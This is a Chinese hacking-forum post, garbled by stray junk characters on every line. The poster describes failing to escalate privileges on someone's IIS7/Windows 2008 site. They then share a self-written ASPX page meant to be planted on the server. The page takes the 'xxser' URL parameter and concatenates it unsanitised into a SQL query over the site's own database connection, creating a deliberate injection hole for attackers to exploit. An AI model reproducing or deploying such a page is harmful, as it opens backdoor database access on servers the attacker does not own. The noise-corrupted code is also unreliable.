昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
' z" Z" B8 c6 Z9 f1 ]3 |1 M其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
7 r V! N& ?/ `% F代码量不多,自己写个拉倒了。烦死了。
2 P7 U T" B; I# V# L! x. {+ P8 F8 L' \# Y) E e- L: f/ X# S: h; l
- t. Z$ Q7 N- F- b5 S
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
}- D B' A4 c6 X<html xmlns="http://www.w3.org/1999/xhtml">
" q9 Q e+ `( r) Y4 p<head runat="server">& ?/ q$ p9 _- }0 I
<title>暗影aspx构造注射专用页面</title>3 X4 I' I/ k6 Y4 w! t" H
</head>! v, E0 Z7 w$ L: P* `- i, l( j* M
<body>4 S6 j. K N" s$ ]0 D. A
<form id="form1" runat="server">
( A) G7 K$ f& [2 d/ b/ J/ S <div>$ y( `8 w3 M8 R6 b' P
<script language="c#" runat="server">: w$ g7 W9 i2 M, c$ b
0 e! e% K6 {) y0 l j, I& ^9 | void page_init(object sender, EventArgs e)" t% W# @/ J4 v9 R' h9 K
{
: W0 O& C" V: |; a
$ F/ L7 @4 [- ^- a+ }6 k System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();3 C# `6 m$ o8 r X B8 Z
Q9 t+ C9 Q$ A' t# F, i( t$ z5 v
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
3 V( E7 ~: y1 B0 b conn.Open();
9 y/ S( a6 s9 z) j# J4 l 4 T0 u3 r" M3 ~1 }& H3 X4 L
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1 @# R$ G8 g, d8 D/ t
5 z0 r: a$ e' _( H. ~+ n# I4 {0 a
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
; M8 A1 o3 h7 f int x = command.ExecuteNonQuery();# V- s: B/ I. K/ w; F
Response.Write(i+"\n");
6 f5 o" y) N. Q+ f" B+ F Z Response.Write(x);
C4 ^/ d/ E6 j conn.Close();1 K, o3 G" Y u' \% X* @) ]# Q
}
4 u% i' b$ Y* T: b: S) Z D 4 U+ {& r# n* x+ l% J
</script>
& R0 c; T) D9 e+ M1 r* g6 L$ |+ m7 o </div>! a7 j) Q+ |0 B. a" Z2 g" e
</form>
- r K) r9 q( `; Y* T- O) K</body>, e6 ~4 x( G4 `6 q2 d
</html>/ [; k+ c1 m9 m/ s4 m0 g: r
|